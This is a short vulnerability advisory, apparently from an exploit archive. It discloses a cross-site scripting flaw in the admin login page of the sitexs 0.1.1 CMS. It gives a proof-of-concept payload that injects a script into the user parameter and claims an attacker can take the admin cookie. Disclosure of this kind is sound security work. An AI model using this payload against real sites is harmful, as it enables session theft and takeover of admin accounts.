# Author: Hadi Kiamarsi # Discovered By: Hadi Kiamarsi # Exploited By: Hadi Kiamarsi # E-Mail: hadikiamarsi@xxxxxxxxxxx # Web Site: http://ircrash.com ############################################################################## # CMS: sitexs-0.1.1 # CMS WebSite: http://sitexs.sf.net # Download CMS: http://heanet.dl.sourceforge.net/sourceforge/sitexs/sitexs-0.1.1.tar.gz ############################################################################## ############################### XSS ######################################## # Bug : # Method: POST # Query : [sitexs]/adm/index.php?user=<script>alert(document.cookie)</script>&pass=111 # The Impact Of This Vulnerability : # Attacker Can Get Admin Cookie With This Vuln ....
